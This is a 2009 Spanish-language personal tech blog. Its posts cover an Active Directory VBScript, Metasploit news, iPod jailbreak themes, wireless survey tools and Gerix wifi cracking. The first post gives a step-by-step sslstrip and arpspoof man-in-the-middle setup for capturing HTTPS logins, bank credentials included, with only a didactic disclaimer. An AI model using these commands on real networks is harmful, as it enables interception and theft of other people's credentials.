martes, 27 de octubre de 2009

SSL Strip

This tool provides a demonstration of the HTTPS stripping attacks presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Yeah!, un ejemplo básico es que puedes ver el username y password de una página de bancos como CapitolOne :S.

Las instrucciones siguientes seran para Fedora, ya que en la página oficial vienen para Debian based:

Python >= 2.4
yum -y install python

Python "twisted-web"
yum -y install python-twisted-web

Arpspoof
yum -y install dsniff

Setup
tar zxvf sslstrip-0.X.tar.gz
cd sslstrip-0.X
(optional) ./setup.py install


Forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward

Configuramos iptables para dirigir el tráfico HTTP a sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port [listenPort]

Ejecutamos sslstrip.
sslstrip.py -l [listenPort]

Ejecutamos arpspoof para que el tráfico sea enviado hacia nuestro equipo.
arpspoof -i [interface] -t [targetIP] [gatewayIP]

Listo, pueden abrir el archivo sslstrip.log para ver las capturas de trafico HTTPS.

Disclaimer: Este post es de cuestiones didacticas para conocer como un atacante puede aprovecharse de un acceso no autorizado a nuestra red y ver el tráfico que va destinado a HTTPS.

[Sitio de SSLStrip]

jueves, 22 de octubre de 2009

Members in Active Directory Group

Me vi en la necesidad de obtener una lista de usuarios de un grupo en AD en Win2003 Svr pero al quererlo hacer por medio de las herramientas administrativas no me daba el resultado deseado e inverti más tiempo de lo normal.

¿Qué fue lo que hice?

Tuve que recurrir al Command Prompt (Modo texto nunca se "raja").
Indagando un poco pude crear un pseudo vbs script:

On Error Resume Next

Const DOMAINGROUP = "LDAP://cn=grupo, cn=Users, dc=midominio,dc=com"
Const GROUPHEADER = "<-= GROUP grupo =->"
Const GROUPFOOTER = "====================="

doYourJob

openFile

Private Sub doYourJob()
Set objGroup = GetObject _
(DOMAINGROUP)
''objGroup.GetInfo

Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.CreateTextFile("members.txt", True)

file.Writeline GROUPHEADER

For each objMember in objGroup.Members
file.Writeline objMember.Name
Next
file.Writeline GROUPFOOTER
file.Close
End Sub

Private Sub openFile()
Const WIN_STYLE = 4
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "notepad.exe c:members.txt", WIN_STYLE
End Sub


Solo hay que hacer copy-paste y grabarlo con extensión vbs.

Saludos!

miércoles, 21 de octubre de 2009

America + Chivas = 3D

Si, primera vez en la historia de la humanidad tecnologica se transmitira un partido en vivo en 3D! y los equipos a disputar dicho partido son nada mas y nada menos que las Aguilas del America y las Chivas del Guadalajara, Super Clasico, si, de nuevo, en 3D!!!!!
[Nota Periodistica]

Rapid7 adquiere Metasploit

Metasploit es el framework libre reconocido mundialmente para ejecutar exploits (hack da stuff!) que ha estado alrededor de 6 años en el ambito de la seguridad de tecnologias de información.

Este desarrollo que era solo de fin de semana o tiempo libre por parte de HD Moore y Egipt ahora sera de tiempo completo, pagado por Rapid7.

En horabuena, esperemos que Rapid7 sepa aprovechar el talento del equipo detras de Metasploit y este framework pueda crecer.

Anuncio Metasploit
Anuncio Rapid7

martes, 20 de octubre de 2009

Prey - Recupera tu Laptop

Como esta escrito en el Sitio de la aplicación:

Prey es un pequeño programa que te ayudará a encontrar tu PC si algún día te lo roban.


Lo mejor de todo es que funciona en Windows/MacOs/Linux, es Open Source y Gratuito!

Prey puede darles esa esperanza de recuperar su laptop en caso de ser robada.

[Prey]

Mi nuevo iPod Theme

Pues el theme se llama TEKNOLOGIK, creado por dazcoates basado en el theme Whitoken.

La configuración puede ser un poco laboriosa, pero al final los resultados son muy buenos.

Primero hay que realizar la configuración como el theme Whitoken [How to].
Despues copiar el theme TEKNOLOGIK.

Asi es como va quedando, me faltan algunos iconos de la sección de Games:




Wireless Tools Windows OS

Despues de ver listas de correos y algo de tiempo navegando en Internet encontre un par de herramientas muy buenas para la verdadera auditoria de redes Wireless (no con aircrack).

La primera es HeatMapper, esta herramienta nos permite cargar un mapa para despues empezar a caminar por el area donde tenemos cobertura wireless trazando lineas por donde vayamos caminando, asi creamos un area de cobertura por cada access point.

La segunda es inSSIDer, es como el NetStumbler pero con esteroides, lo interesante es que tiene soporte nativo para la Wifi API de Windows.

Bueno, ahi las tienen, have fun!

jueves, 15 de octubre de 2009

Problemas con iPod Touch 2G + iPhoneBrowser

Pues si, realice el super upgrade de 3.0 a 3.1.2 del firmware del iPod con jailbreak incluido gracias a la lluv1a negra.

Ahora bien quise cambiar el theme de mi iPod pero me fue imposible ya que iPhoneBrowser no detecta el dispositivo con Jailbreak.

Esto se debe en la forma que realicé el Jailbreak (con lluv1a negra) ya que no se crea un servicio llamado afc2 que necesita tanto el iPhoneBrowser como DiskAid para poder desplegar el árbol del sistema de archivos.

Para agregar este servicio solamente hay de dos, manualmente o por medio de Cydia, esto segundo fue la forma en como lo realice, busque la aplicación afc2add de modmyi.com, la instale y listo!, ya puedo ver de nuevo el sistema de archivos.

Ahora a "pimpear" el iPod con un nuevo theme.

jueves, 1 de octubre de 2009

Assembly Language and SecurityTube

Revisando mis correos me encontre con una interesante discusión en la cual se preguntaba sobre un sitio para aprender lenguaje ensamblador, me llamo la atención una respuesta en la cual mencionan a SecurityTube, el cual es como un YouTube para personas que les interesa la seguridad en IT.

Dentro de esa respuesta se dio la siguiente lista de videos para aprender ensamblador:

1. System Organization Concepts:

http://tinyurl.com/ceq5fy

2. Virtual Memory Basics:

http://tinyurl.com/c7o956

3. GDB Primer:

http://tinyurl.com/cmsvfj

4. Coding your first Hello World program

http://tinyurl.com/dj9fgn

5. Data types in Assembly:

http://tinyurl.com/cs6cy4

6. Moving Data around in a program:

http://tinyurl.com/cmwv3r

7. Working with Strings::

http://tinyurl.com/dlav5f

8. Unconditional Branching techniques:

http://tinyurl.com/djthgy

9. Conditional Branching using the JMP family:

http://tinyurl.com/ce9npc

10. Functions in Assembly

http://tinyurl.com/cy8b9m

11. Understanding the Stack

http://tinyurl.com/dh72ow

Ahora para los que deseen aprender ensamblador, lets get it on!.

Gerix Wifi Cracker New Generation

¿Qué es Gerix Wifi Cracker NG?

Es un GUI para Aircrack-NG para atacar Access Points y Routers Wireless de una forma rápida y sencilla. Otra palabra que le gusta utilizar a un amigo en vez de atacar es auditar...

Esta herramienta esta escrita en Python y QT.

Como dicen en la página del proyecto:

with Gerix WIFI Cracker NG, EVEN MY GRANDMOTHER KNOWS HOW TO CRACK A WIRELESS NETWORK!

con Gerix WIFI Cracker NG, incluso mi abuela sabe como crackear una red wireless

Enjoy!
Página de Gerix